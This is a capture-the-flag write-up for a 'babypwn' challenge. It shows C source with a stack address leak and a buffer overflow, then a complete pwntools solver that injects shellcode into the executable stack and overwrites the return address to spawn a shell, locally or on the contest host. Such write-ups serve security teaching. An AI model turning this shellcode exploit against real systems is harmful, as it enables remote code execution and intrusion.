Rating:

We were given a binary file and its source code.

```
#include <stdio.h>
#include <unistd.h>

int main() {
    /* Unbuffered stdout, so each prompt is delivered before read() blocks. */
    setbuf(stdout, NULL);

    /* 512-byte stack buffer; the read() below accepts up to 1024 bytes. */
    char username[512];

    printf("You shell play a game against @gehaxelt! Win it to get ./flag.txt!\n");
    /* Information leak: prints the stack address of `username`, telling the
     * client exactly where its input lands. Never print raw pointers. */
    printf("Your game slot is at: %p\n", username);
    printf("What's your name?\n");
    /* Reads from fd 1 rather than stdin (0) -- presumably works because fd 1
     * is a terminal or socket that is also readable. The length (1024) is
     * twice the buffer size (512): a stack buffer overflow. A bounded read
     * (sizeof username - 1) would close it; note the input is also not
     * NUL-terminated before the %s below. */
    read(1, username, 1024);
    printf("Ok, it's your turn, %s!\n", username);
    printf("You lost! Sorry :-(\n");

    return 0;
}
```

The program leaks a stack address by printing the address of the ‘username’ variable with printf() and the “%p” format. It then asks the user for input with read(), using 1024 bytes as the maximum input size, and stores the data in ‘username’. However, since ‘username’ can hold only 512 bytes, this is a buffer overflow vulnerability.

Because NX protection is disabled (the stack is mapped rwx), shellcode placed in the payload can be executed directly from the stack. To reach the shellcode, the buffer overflow is used to overwrite the saved return instruction pointer (RIP) with the leaked address of the ‘username’ variable; the leak is needed because the stack's location is not fixed from one run to the next.

Solver:

```
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
from os import path
import sys

# ==========================[ Information
# Paths are resolved relative to this script; the binary is expected beside it.
DIR = path.dirname(path.abspath(__file__))
EXECUTABLE = "/babypwn"
TARGET = f"{DIR}{EXECUTABLE}"
# Challenge endpoint and run-mode flags; __main__ flips one of the flags
# depending on how the script is invoked.
HOST = "52.59.124.14"
PORT = 10020
REMOTE = False
LOCAL = False

# ==========================[ Tools
# Parsed target binary; pwntools takes architecture/symbol info from it.
elf = ELF(TARGET)
# ROP helper built from the binary; not referenced by the visible exploit code.
elfROP = ROP(elf)

# ==========================[ Configuration
# Global pwntools context: 64-bit little-endian Linux (index 1 of the arch
# list), 'warn' log level, and a tmux split pane for gdb.attach().
context.update(
    arch=["i386", "amd64", "aarch64"][1],
    endian="little",
    os="linux",
    log_level = ['debug', 'info', 'warn'][2],
    terminal = ['tmux', 'split-window', '-h'],
)

# ==========================[ Exploit

def exploit(io, libc=null):
    """Drive the babypwn tube: parse the leaked address, send the payload, go interactive.

    Args:
        io: pwntools tube (process or remote) already connected to the target.
        libc: not used in this function; placeholder for libc-based variants.
            NOTE(review): ``null`` is not a Python name (``None`` is), so this
            default raises NameError when the module loads unless ``null`` is
            defined elsewhere -- confirm.
    """
    if LOCAL==True:
        #raw_input("Fire GDB!")
        # Optional debugger attach when the script is run with a "d" argument.
        if len(sys.argv) > 1 and sys.argv[1] == "d":
            choosen_gdb = [
                "source /home/mydata/tools/gdb/gdb-pwndbg/gdbinit.py", # 0 - pwndbg
                "source /home/mydata/tools/gdb/gdb-peda/peda.py", # 1 - peda
                "source /home/mydata/tools/gdb/gdb-gef/.gdbinit-gef.py" # 2 - gef
            ][0]
            # Breakpoint at main+142 -- presumably around the read(); confirm
            # against the binary's disassembly.
            cmd = choosen_gdb + """
b *main+142
"""
            gdb.attach(io, gdbscript=cmd)

    # The binary prints the address of `username` with %p; parse it as hex.
    io.recvuntil(b"Your game slot is at: ")
    LEAKED_STACK = int(io.recvuntil(b"\n", drop=True).decode(), 16)
    print("LEAKED_STACK :", hex(LEAKED_STACK))

    # Distance from the start of `username` to the saved return address:
    # 0x200 of frame (sub rsp, 0x200) plus 8 for the saved rbp. The shellcode
    # comes first, padded (ljust pads with spaces by default) to that offset,
    # then the leaked buffer address so the return lands on the shellcode.
    # This depends on the stack being executable (NX off); NX or a stack
    # canary would defeat this payload.
    RIP_OFFSET = 0x200+8 # sub rsp, 0x200 (+8 to overwrite rbp)
    p = b""
    p += asm(shellcraft.sh()).ljust(RIP_OFFSET)
    p += p64(LEAKED_STACK)
    # Zero-padded to the read() size named in the C source (1024 bytes).
    io.send(p.ljust(1024, b"\x00")) # 1024 (the max input size), from: read(1, username, 1024);

    io.interactive()

if __name__ == "__main__":
    # NOTE(review): ``null`` is not defined in Python; ``None`` is the intended
    # value here (and in exploit()'s default argument).
    io, libc = null, null

    # `args` is pwntools' command-line switch parser (e.g. `./solve.py REMOTE`).
    if args.REMOTE:
        REMOTE = True
        io = remote(HOST, PORT)
        # libc = ELF("___")

    else:
        LOCAL = True
        # Local run of the binary found beside this script; the commented env
        # entries are placeholders for preloading a specific libc.
        io = process(
            [TARGET, ],
            env={
                # "LD_PRELOAD":DIR+"/___",
                # "LD_LIBRARY_PATH":DIR+"/___",
            },
        )
        # libc = ELF("___")
    # Indentation restored so this runs for both the remote and local branch.
    exploit(io, libc)
```

Original writeup (https://hackmd.io/@vidner/nullcon-sksd#Babypwn-pwn).